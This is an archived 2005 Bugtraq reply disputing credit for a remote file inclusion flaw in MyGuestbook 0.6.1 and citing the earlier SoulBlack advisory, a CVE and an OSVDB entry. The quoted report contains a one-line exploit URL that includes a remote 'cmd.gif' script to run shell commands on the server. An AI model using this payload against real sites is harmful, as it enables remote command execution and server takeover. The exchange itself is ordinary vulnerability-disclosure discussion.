lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <Pine.LNX.4.63.0509230358180.5282@forced.attrition.org> Date: Fri, 23 Sep 2005 04:00:04 -0400 (EDT) From: security curmudgeon <jericho@...rition.org> To: rod hedor <rodhedor@...mail.com> Cc: bugtraq@...urityfocus.com Subject: Re: Remote File Inclusion in MyGuestbook : Remote File Inclusion in MyGuestbook : : version: 0.6.1 : : Exploit : : http://server/Guestbook/form.inc.ph...cmd.gif?&cmd=id : : Discovery by RoDheDoR This was discovered/posted on July 5 by SoulBlack Security Research: http://archives.neohapsis.com/archives/bugtraq/2005-07/0040.html http://www.soulblack.com.ar/repo/papers/advisory/myguestbook_advisory.txt http://cve.mitre.org/cgi-bin/cvename.cgi?name=2005-2162 http://osvdb.org/17750